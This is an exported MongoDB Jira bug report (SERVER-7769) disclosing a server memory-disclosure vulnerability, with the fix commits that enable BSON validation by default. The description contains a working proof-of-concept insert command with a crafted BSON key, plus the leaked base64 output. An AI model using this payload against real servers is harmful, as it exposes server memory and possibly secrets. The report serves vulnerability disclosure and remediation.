[SERVER-7769] use --objcheck by default, Server arbitrary memory reading Created: 27/Nov/12  Updated: 11/Jul/16  Resolved: 20/Dec/12

Status: Closed
Project: Core Server
Component/s: None
Affects Version/s: None
Fix Version/s: 2.3.2

Type: Bug Priority: Major - P3
Reporter: Yury Assignee: Eliot Horowitz (Inactive)
Resolution: Done Votes: 1
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified

Issue Links:
Duplicate
is duplicated by SERVER-7691 Java driver is capable of crashing mo... Closed
is duplicated by SERVER-8272 Add command line option for "noObjcheck" Closed
Related
is related to SERVER-6519 MongoDB Crash Under High Load Closed
Operating System: ALL
Participants:

 Description   

The specialists of the Positive Research center have detected "Server arbitrary memory reading" vulnerability in MongoDB application.

Cause of incorrect execution of BSON-document length in column name in the insert command it’s possible to insert a record which can contain a base64-encrypted server memory chunks.

Example of use:

Suppose you have a table "dropme" with write permission.

Execute the following command with a result:

> db.dropme.insert(

{"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}

)
> db.dropme.find()

{ "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

After base64-code decryption you can get bytes from random server memory chunks.

Credits

The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)



 Comments   
Comment by auto [ 20/Dec/12 ]

Author:

{u'date': u'2012-12-20T03:15:03Z', u'email': u'eliot@10gen.com', u'name': u'Eliot Horowitz'}

Message: SERVER-7769 - turn objcheck on by default and use new fast bson validate
Branch: master
https://github.com/mongodb/mongo/commit/f9817a6cf64bdba8e1e1cef30a798110df746b58

Comment by auto [ 18/Dec/12 ]

Author:

{u'date': u'2012-12-18T14:40:08Z', u'name': u'Eliot Horowitz', u'email': u'eliot@10gen.com'}

Message: SERVER-7769 - fast bson validate
Branch: master
https://github.com/mongodb/mongo/commit/6889d1658136c753998b4a408dc8d1a3ec28e3b9

Generated at Thu Feb 08 03:15:33 UTC 2024 using Jira 9.7.1#970001-sha1:2222b88b221c4928ef0de3161136cc90c8356a66.